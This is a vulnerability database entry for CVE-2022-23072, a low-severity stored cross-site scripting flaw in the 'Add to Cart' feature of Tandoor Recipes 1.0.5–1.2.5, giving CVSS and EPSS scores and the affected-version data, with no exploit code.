CVE-2022-23072

2022-06-2108:15:07

CWE-79

[email protected]

web.nvd.nist.gov

801

cve-2022-23072

recipes

xss

stored xss

add to cart

security vulnerability

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.0004 Low

EPSS

Percentile

13.0%

JSON

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.

Affected configurations

NVD

Node

tandoorrecipesRange1.0.5–1.2.5

CPENameOperatorVersion
tandoor:recipestandoor recipesle1.2.5

CPE	Name	Operator	Version
tandoor:recipes	tandoor recipes	le	1.2.5

CNA Affected

[
  {
    "product": "recipes",
    "vendor": "recipes",
    "versions": [
      {
        "lessThan": "unspecified",
        "status": "affected",
        "version": "1.0.5",
        "versionType": "custom"
      },
      {
        "lessThanOrEqual": "1.2.5",
        "status": "affected",
        "version": "unspecified",
        "versionType": "custom"
      }
    ]
  }
]